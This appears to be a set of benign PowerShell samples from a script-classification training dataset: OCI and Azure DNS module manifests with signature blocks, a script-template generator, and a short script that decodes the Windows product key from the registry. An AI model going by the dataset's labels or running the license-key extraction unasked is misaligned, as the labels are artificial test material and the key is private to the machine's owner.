CIt12UcA5BOsXp1Ptkjx2yRsCj77DSml0zVYjqW/ISWkrGjyeVJ+khzctxaLkklV # wCxigokD6fkWby0hCEKTOTPMzhugPIAcxcHsR2sx01YRa9pH2zvddsuBEfSFG6Cj # 0QSvEZ/M9mJ+h4miaQSR7AEbVGDbyRKkYn80S+3AmRlh3ZOe+BFqJ57OXdeIDSHb # vHzJ7oTqG896l3eUhPsZg69fNgxTxlvRNmRE/+61Yj7Z1uB0XYQP60rsMLdTlVYE # yZUl5MLTL5LvqFozZlS2Xoji4BEP6ddVTzmHJ4odOZMWTTeQ0IwnWG98vWv/roPe # gCr1G61FVrdXLE3AXIft4ZN4ZkDTnoAhPw7DZNPRlSW4TbVj/Lw0XvnLYNwMUA9o # uY/wx9teTaJ8vTkbgYyaOYKFz6rNRXZ4af6e3IXwMCffCaspKUXC72YMu5W8L/zy # TxsNUEgBbTCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI # hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy # MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC # AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg # M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF # dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6 # GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp # Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu # yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E # XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0 # lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q # GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ # +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA # PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw # EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG # NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV # MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj # cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK # BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC # AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX # zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v # cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI # KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG # 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x # M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC # VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449 # xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM # nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS # PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d # Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn # GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs # QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL # jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL # 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNN # MIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn # MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjMzMDMtMDVFMC1EOTQ3MSUwIwYDVQQD # ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQDi # WNBeFJ9jvaErN64D1G86eL0mu6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smrUDAiGA8yMDI0MTAyODA2MTg1 # NloYDzIwMjQxMDI5MDYxODU2WjB0MDoGCisGAQQBhFkKBAExLDAqMAoCBQDqyatQ # AgEAMAcCAQACAiZmMAcCAQACAhORMAoCBQDqyvzQAgEAMDYGCisGAQQBhFkKBAIx # KDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZI # hvcNAQELBQADggEBAEBxNUvMJ0O0UDu8Og9sWf208vhSkFloumMW1RvgFdb92+TH # K6H4x3VJwAos7fSTrcyd3rBsbPaWsDzEE8lSpQZRl1tT+xqJ9FN0+DhU7VbhQzFp # lSEQLO3ZUNQUMNltvLzXqrbJuEfQiXerQxhkutzT4Cehf10MosdYIq9nQ6IhxL20 # siq9Nudp03+xjjbZmZjrxvnqZQ1GXhucuPUTYDKdOdHa+dU71t77KkdCeO70ybxR # 1x1yXXr+kaA0X/o61KSn3G2WSmzdwnX2nOuuBi5Wptv9NmwZTYfI/s4Qh0GVxQ1v # Relr66myMkPQ75xHUd8APnZdEG/h251KOccn5yUxggQNMIIECQIBATCBkzB8MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNy # b3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAebZQp7qAPh94QABAAAB5jAN # BglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8G # CSqGSIb3DQEJBDEiBCC6Yq/tNFcFA9GfOyf2h+YNgTsWIGCBzrgg+4gx1LkmaTCB # +gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIM+7o4aoHrMJaG8gnLO1q16hIYcR # noy6FnOCbnSD0sZZMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh # c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD # b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw # MTACEzMAAAHm2UKe6gD4feEAAQAAAeYwIgQgTB6qQcMdP6fMqtySduFITAgYbREF # 90zOkmEDwIb58bEwDQYJKoZIhvcNAQELBQAEggIAWbavcbkQLMSNeOYlE/gA5VQC # W9ZKyEDmUux1k5+BnDnUNOLT2g6DZLkRfjc3mCbNtwO3vCvjW2uR7LDaXw755B9b # jgOwGr2tAN8/yHsVvDR7RX/Wbfb+/YqLE+4mja56IYvMAlI26ZqFpNVwLoC+vtF1 # 3T/hXkOKKCTV3fODCUTNZVIVF+X+xDYJjt5DbAFmD4gaTWFc8gTAg0DfRrQ8Glp1 # hCldvCRz+ervVNHgfz0BE42MWYJ6lORIsx88eauKNLDZYtyioi82q4p5Qt4WMnF1 # VZCjcGAI1/Q8iY1wV+kbuMxJv1h4zVR0PUu7IdfwJ8Ws/uGMTDzS6CYHYDE57zpm # OnO8TaTv40LNVsXAwDfShUOvEahHwL/JCn0tH0Do8HQLQjViwaO5lMmvdF6Jx4Jn # qGJlxB2Th7d5L1DZa7YHZjnMbDKkkXaFpmND5qoSrelnz2IXFkwmnBOIQMRjfZoB # vdWeU4Gor2kvwF9H0vn/sa/hNLcyecg+2T0iGs9XjpQrxbp2ERorUR4E7G1y7lco # p8cyiuHGDB5f2ZewqhdRqEFKi1qclMrGk0aHp/Pp/oDv+62JzKCRksyljfKRP3Qu # driay6o1BVIzACFdLIf3+parPqtYcI2YxdOmvHR5E2eZRMsSxdduOAYF7wskaFxS # dIqIA6Isqq/z5LF95ds= # SIG # End signature block
combined_dataset/train/non-malicious/sample_23_58.ps1
sample_23_58.ps1
# # Module manifest for module 'OCI.PSModules.Blockchain' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Blockchain.dll' # Version number of this module. ModuleVersion = '80.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = 'ed7a188d-b220-4182-bc10-6c9d8157ad66' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Blockchain Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '80.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Blockchain.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIBlockchainOsn', 'Get-OCIBlockchainOsnsList', 'Get-OCIBlockchainPeer', 'Get-OCIBlockchainPeersList', 'Get-OCIBlockchainPlatform', 'Get-OCIBlockchainPlatformPatchesList', 'Get-OCIBlockchainPlatformsList', 'Get-OCIBlockchainWorkRequest', 'Get-OCIBlockchainWorkRequestErrorsList', 'Get-OCIBlockchainWorkRequestLogsList', 'Get-OCIBlockchainWorkRequestsList', 'Invoke-OCIBlockchainPreviewScaleBlockchainPlatform', 'Invoke-OCIBlockchainScaleBlockchainPlatform', 'Invoke-OCIBlockchainUpgradeBlockchainPlatform', 'Move-OCIBlockchainPlatformCompartment', 'New-OCIBlockchainOsn', 'New-OCIBlockchainPeer', 'New-OCIBlockchainPlatform', 'Remove-OCIBlockchainOsn', 'Remove-OCIBlockchainPeer', 'Remove-OCIBlockchainPlatform', 'Remove-OCIBlockchainWorkRequest', 'Start-OCIBlockchainPlatform', 'Stop-OCIBlockchainPlatform', 'Update-OCIBlockchainOsn', 'Update-OCIBlockchainPeer', 'Update-OCIBlockchainPlatform' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Blockchain' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/PowerShell Template_1.ps1
PowerShell Template_1.ps1
Function New-Script { $strName = $env:username $date = get-date -format d $name = Read-Host "Filename" if ($name -eq "") { $name="NewTemplate" } $email = Read-Host "eMail Address" if ($email -eq "") { $email="youremail@yourhost.com" } $file = New-Item -type file "$name.ps1" -force $template=@" ########################################################################### # # NAME: $name.ps1 # # AUTHOR: $strName # EMAIL: $email # # COMMENT: # # You have a royalty-free right to use, modify, reproduce, and # distribute this script file in any way you find useful, provided that # you agree that the creator, owner above has no warranty, obligations, # or liability for such use. # # VERSION HISTORY: # 1.0 $date - Initial release # ########################################################################### "@ | out-file $file ii $file }
combined_dataset/train/non-malicious/Product key_2.ps1
Product key_2.ps1
from System import Array, Char, Console from System.Collections import ArrayList from Microsoft.Win32 import Registry def DecodeProductKey(digitalProductID): map = ("BCDFGHJKMPQRTVWXY2346789").ToCharArray() key = Array.CreateInstance(Char, 29) raw = ArrayList() i = 52 while i < 67: raw.Add(digitalProductID[i]) i += 1 i = 28 while i >= 0: if (i + 1) % 6 == 0: key[i] = '-' else: k = 0 j = 14 while j >= 0: k = (k * 256) ^ raw[j] raw[j] = (k / 24) k %= 24 key[i] = map[k] j -= 1 i -= 1 return key reg = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion") val = reg.GetValue("DigitalProductId") Console.WriteLine(DecodeProductKey(val))
combined_dataset/train/non-malicious/sample_20_21.ps1
sample_20_21.ps1
# # Module manifest for module 'Az.Dns' # # Generated by: Microsoft Corporation # # Generated on: 23/04/2024 # @{ # Script module or binary module file associated with this manifest. RootModule = 'Az.Dns.psm1' # Version number of this module. ModuleVersion = '1.2.1' # Supported PSEditions CompatiblePSEditions = 'Core', 'Desktop' # ID used to uniquely identify this module GUID = 'f9850afe-b631-4369-ab61-eca7023f2f42' # Author of this module Author = 'Microsoft Corporation' # Company or vendor of this module CompanyName = 'Microsoft Corporation' # Copyright statement for this module Copyright = 'Microsoft Corporation. All rights reserved.' # Description of the functionality provided by this module Description = 'Microsoft Azure PowerShell - DNS service cmdlets for Azure Resource Manager in Windows PowerShell and PowerShell Core. For more information on DNS, please visit the following: https://learn.microsoft.com/azure/dns/' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '5.1' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. DotNetFrameworkVersion = '4.7.2' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @() # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'Dns.Autorest/bin/Az.Dns.private.dll', 'Microsoft.Azure.PowerShell.Dns.Management.Sdk.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module FormatsToProcess = 'Dns.Autorest\Az.Dns.format.ps1xml' # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess NestedModules = @('Dns.Autorest/Az.Dns.psm1') # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = 'Get-AzDnsDnssecConfig', 'New-AzDnsDnssecConfig', 'Remove-AzDnsDnssecConfig' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Add-AzDnsRecordConfig', 'Get-AzDnsRecordSet', 'Get-AzDnsZone', 'New-AzDnsRecordConfig', 'New-AzDnsRecordSet', 'New-AzDnsZone', 'Remove-AzDnsRecordConfig', 'Remove-AzDnsRecordSet', 'Remove-AzDnsZone', 'Set-AzDnsRecordSet', 'Set-AzDnsZone' # Variables to export from this module # VariablesToExport = @() # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = @() # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'Azure','ResourceManager','ARM','DNS' # A URL to the license for this module. LicenseUri = 'https://aka.ms/azps-license' # A URL to the main website for this project. ProjectUri = 'https://github.com/Azure/azure-powershell' # A URL to an icon representing this module. # IconUri = '' # ReleaseNotes of this module ReleaseNotes = '* Introduced secrets detection feature to safeguard sensitive data.' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' } # SIG # Begin signature block # MIInzgYJKoZIhvcNAQcCoIInvzCCJ7sCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBNb7e/s2Q+zUiU # MatzIRQARO4mkN5R+cA7DOPhkpvX6qCCDYUwggYDMIID66ADAgECAhMzAAADri01 # UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG # yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899 # QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82 # 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV # M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd # WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W # 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY # 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV # APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37 # ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57 # xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t # Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i # 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk # 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK # 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO # zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # 